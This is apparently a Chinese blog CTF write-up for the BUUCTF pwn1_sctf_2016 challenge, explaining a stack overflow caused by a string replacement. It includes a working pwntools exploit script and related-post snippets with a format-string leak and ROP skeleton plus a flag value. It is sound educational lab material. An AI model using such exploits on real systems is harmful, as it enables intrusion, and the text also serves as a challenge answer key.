BUUCTF|PWN-pwn1_sctf_2016

最新推荐文章于 2025-04-08 20:16:28 发布

Rt1Text

最新推荐文章于 2025-04-08 20:16:28 发布

阅读量711

点赞数

分类专栏： BUUCTF 文章标签：安全 pwn python linux c语言

本文链接：https://blog.youkuaiyun.com/arraylocalhost/article/details/124354740

版权

BUUCTF 专栏收录该内容

34 篇文章

订阅专栏

1.checksec+运行

32位+NX保护

2.IDA进行中

1.vul函数

fgets()溢出函数

跟进s查看偏移

offset=0x3c+4

0x3c十进制为60

再来分析函数

replace函数:替换

先写入字符串you

再写入字符串I

然后将I 替换成you

这样的话1个字节就变成了3个

那么我们用20个I,就能换成20个you,60个字节

再加上get flag 的地址

3.脚本

from pwn import*
#p=process("./5sctf_2016")
p=remote("node4.buuoj.cn",25225)
flag_addr=0x08048F0D	
payload=b'I'*20+b'a'*4+p32(flag_addr)
p.sendline(payload)
p.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Rt1Text

关注关注

0
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

日行一pwn：pwn1_sctf_2016

m0_57221101的博客

05-13

680

用俩图床，有的有水印，有的没水印，折磨距离上一次日行一pwn已经快一个月了，干脆改成月行一pwn吧（汗。这段时间去恶补了王爽老师的汇编语言。结果一回来就做了这么一道题，函数封装的严严实实，打眼一看全是C++。想入门pwn这么难吗。正片 BUUCTF在线评测使用BUUCTF靶场，首先标准步骤下载--放到kali里面查--拖到windows用ida反汇编发现只有一个NX保护 NX保护就是CPU不会执行放在内存段中的代码，也就是我们之前在BOF中学习的像内存中写入Shell的方法

BUUCTF-pwn2_sctf_2016

weixin_44145820的博客

03-06

1108

这题利用的是负数转无符号数造成缓冲区溢出，以及泄露libc基地址执行ROP 题目分析由于NX开启，我们考虑使用ROP，Canary没有打开使得这题变得很方便下面是vuln函数：在该函数中，程序读入一个字符串并转化为带符号整形（signed int），这时，如果我们输入负数可以避开不能大于32的检查在get_n函数中，读入长度被强制转换为unsigned int，此时-1变成了42949...

参与评论您还未登录，请先登录后发表或查看评论

BUUCTF Pwn pwn1_sctf_2016

MrTreebook的博客

12-05

1407

BUUCTF Pwn pwn1_sctf_20161.题目下载地址2.checksec检查保护3.IDA分析4.看一下栈大小5.找到后门函数地址6.exp 1.题目下载地址点击下载题目 2.checksec检查保护运行一下看看 3.IDA分析看一下伪代码 int vuln() { const char *v0; // eax char s[32]; // [esp+1Ch] [ebp-3Ch] BYREF char v3[4]; // [esp+3Ch] [ebp-1Ch] BYREF

pwn1_sctf_2016 1（栈溢出）

最新发布

Snk0xHeart的博客

04-08

261

开虚拟机，checksec32位，还是没开栈保护扔进IDA（32位），找到main，F5反编译没有啥，点进去vuln看看眼花缭乱，先按Shift+F12打开string窗口，一键找出所有的字符串，看看有啥诶，有个cat flag，点进去，然后Ctrl+x，确定按Tab转成c语言看下喔，后门函数这不找到了嘛，然后回去看看vuln函数我们看到第12行的fgets函数，这是我们的输入点，限制在32个字符不熟悉这个函数，求助一下AI：1、可导致栈溢出。

[buuctf]pwn1_sctf_2016

逆向萌新的博客

05-30

1845

buuctf：pwn题pwn1_sctf_2016（细致分析）

buuctf之pwn1_sctf_2016

weixin_54452942的博客

03-27

823

简单易懂~

BUUCTF|PWN-pwn1_sctf_2016-WP

l2645470582_的博客

07-29

857

1、下载文件并开启靶机 2、在Linux中查看该文件信息 checksec pwn1_sctf_2016 3、该文件是62为文件，我们用32为IDA打开该文件 3.1、shift+f12查看关键字符串 3.2、双击关键字符串，ctrl+x查看cat flag.txt地址 3.3、F5进入main函数反编译代码区 3.4、看到有个vuln（）关键函数，双击进去 3.5、我们看见关键字变量名溢出，双击查看 s地址： r地址： ...

BUUCTF pwn pwn2_sctf_2016

菜的只能随便写写博客

02-18

2626

0x01 分析 0x02 运行程序读入一个长度，然后按照长度读入后面输入的data并回显。 0x03 IDA 数据长度被限制为32，无法溢出，接着查看get_n函数。接受a2个长度的字符串并放到vuln函数的缓冲区内部，但是a2传入的值类型是unsigned int，而前面判断长度的类型是int，可以规避长度限制。 0x04 思路输入负数长度，绕过长度检查，执行r...

CTF-PWN-buuctf-pwn1_sctf_2016-CPP的字符串替换

serfend's blog

04-14

570

CTF-PWN 来源：https://buuoj.cn/challenges 内容：附件：https://pan.baidu.com/s/1bSrSQZYWkBIWCXP5Lsq7sg?pwd=mpgo 提取码：mpgo 答案：flag{714a8f91-7e24-440c-8cc6-1f2d26adbcec} 总体思路发现get_flag的位置发现输入会被替换，构造exp 详细步骤查看文件信息查看题目发现是将用户输入的I替换为you，虽然输入的时候只允许输入32位，但是因为替换

BUUCTF-PWN刷题记录-14

weixin_44145820的博客

04-29

869

目录sctf_2019_easy_heap（块重叠，double free） sctf_2019_easy_heap（块重叠，double free）这题原题目好像是在Ubuntu16下的，但是BUU上面是Ubuntu18，所以应该更简单一点总的来说，这题应该是ciscn_2019_final_3的加强版吧，当然也有更简单的地方首先，给了我们一块rwx的空间 add函数会给你conten...

BUUCTF pwn1_sctf_2016

CHAWUCIREN1的博客

04-08

3503

执行一下似乎出现第一个i被替换成you 检查一下保护机制丢到ida里面输入的变量s大小为0x3c，但是我们看fgets里面，我们只能输入32个字符，没法进行溢出，我们在输入的时候，会发现i会被替换成you，所以我们可以利用20个i来填充，找到shell，地址为0x8048F0D 返回地址再随便填四个字符我们可以构造一下payload payload = ‘I’*20 + p64(0x8048F0D) 这里特别注意一下 payload可以有多种写法 ‘I’ *19 + ‘A’*7 + p

buuctf-pwn1 sctf 2016

weixin_45427676的博客

09-20

778

拿到文件后checksec一下，发现开启了NX保护，说明堆栈不可执行，那我们就不能向堆栈上写东西。查看一下程序 main()函数调用了vuln()函数，查看一下此函数有没有什么漏洞可以利用，enmenm,发现代码很多不知道什么意思（太菜了太菜了），好好看看这些代码到底啥意思吧~~,部分代码注释如下：本来看到代码5处，想着能通过向缓冲区S中写入数据，利用栈溢出来覆盖返回地址为后门函数地址，但是fgets()函数告诉我此法不行，因为你最多只能向S中输入32个字符，而缓冲区S的大小为0x3c，也就是需要输入

BUUCTF pwn——pwn1_sctf_2016

CNS-Enterprise BCC-1701-J

03-12

222

BUUCTF 做题练习

[BUUCTF]——pwn1_sctf_2016

m0_68381884的博客

03-28

548

拿到文件先检查一下得出结论这是32位程序且开启了nx保护。用32位ida打开文件，并使用ida分析，看到较为敏感的“get flag” 双击跟进，找到函数后按F5将其反编译得到我们熟悉的伪代码看到这个函数的作用就是输出“flag.txt”里的内容，记一下地址flag_addr=08048F0D 进入main函数双击 vuln 函数， 0x02 编写exp: from pwn import* r=remote("redirect.do-not-trust.h.

buuctf pwn1_sctf_2016

A_fish_like_sing的博客

03-21

205

buu ctf pwn1_sctf_2016

(buuctf) - pwn入门部分wp - rip -- pwn1_sctf_2016

J1ayの博客

09-10

1623

⭐ 【buuctf】pwn入门 pwn学习之路引入栈溢出引入 ⭐test_your_nc 【题目链接】注意到 Ubuntu 18， Linux系统。 nc 靶场 nc node3.buuoj.cn 25677 【注】 nc命令详解 -c shell命令为“-e”；使用/bin/sh来执行 [危险] -e 文件名程序在连接后执行 [危险] -b 允许广播 -g 网关源路由跃点，最多8个 -G num源路由指针：4，8，12。。。 -i secs 发送的线

BUUCTF-PWN题详解（pwn1_sctf_2016 1&jarvisoj_level0 1）

2302_80325559的博客

11-27

1729

今天给大家介绍了几个危险函数strcpy、read，以及Python pwn模块的一些函数用法。这几天也做了这六道溢出的题，思路大差不差，都是先找从哪儿溢出，然后后门的地址。如果大家可以自己独立做出来的话，就可以说只要以后见到这种题，分分钟拿下。后面的题就不会留这么明显的后门给我们了，会让我们自己创建后门，难度会大一点点。我尽量以简洁的语言给大家说清楚，大家一起加油！

Buuctf pwn1_sctf_2016

qq_53809201的博客

03-19

609

checksec run ida 在程序中搜索既没有system又没有bin/sh,所以明显的rop nptr处可以使用整数溢出构造rop 然后可以利用printf函数来泄露程序的libc版本覆盖返回地址执行system来getshell exp from pwn import * from LibcSearcher import * context(os = 'linux', arch = 'i386', log_level = 'debug') elf = ELF("./pwn2") loca

pwn1_sctf_2016

02-09

### 关于 PWN1 SCTF 2016 CTF 比赛解题报告 #### 题目概述 PWN1 SCTF 2016 是一次涉及栈溢出漏洞利用的比赛项目。参赛者需理解二进制文件执行流程以及如何通过特定输入控制程序流来实现非授权操作[^2]。 #### 漏洞分析该挑战主要围绕栈缓冲区溢出展开。当应用程序未能正确验证用户输入长度时，攻击者可以构造恶意数据覆盖堆栈上的返回地址或其他重要变量位置。具体到此案例中，存在一处未受保护的函数调用允许外部输入直接写入固定大小的内存区域而没有任何边界检查机制。 #### 利用方法为了成功完成这一关卡，选手们通常采用如下策略： - **寻找合适的gadget链**：由于现代操作系统普遍启用了多种防护措施（如NX位），单纯注入shellcode变得困难重重；因此需要找到一系列ROP gadgets组合起来绕过这些限制。 - **泄露 libc 地址**：考虑到目标机器上可能安装有不同版本的标准C库(libc)，事先获取其基地址有助于后续精确计算所需偏移量。一种常见做法是先触发格式化字符串错误从而读取got表项中的实际映射位置[^4]。 - **构建 payload**：最终形成的载荷不仅要能够跳转至系统命令解释器(`/bin/sh`)所在处启动交互式终端会话，还要巧妙规避各种随机化技术的影响。这往往涉及到精心安排参数传递顺序并调整寄存器状态以匹配期望环境[^1]。 ```python from pwn import * # 假设已知某些关键信息... elf = ELF('vuln_binary') libc = ELF('/path/to/libc.so') # 远程连接或本地调试设置 conn = remote('target_host', port) # 发送初始输入引发泄漏 conn.sendlineafter(b'> ', b'%7$s' + cyclic(8)) leak_data = conn.recvuntil('\n').strip() # 处理泄露出的数据得到libc基址 base_addr = u64(leak_data.ljust(8, b'\x00')) - libc.symbols['puts'] log.info(f"Leaked base address: {hex(base_addr)}") # 构造用于执行/bin/sh的有效负载 payload = flat([ ... # 此处省略具体细节 ]) conn.interactive() ```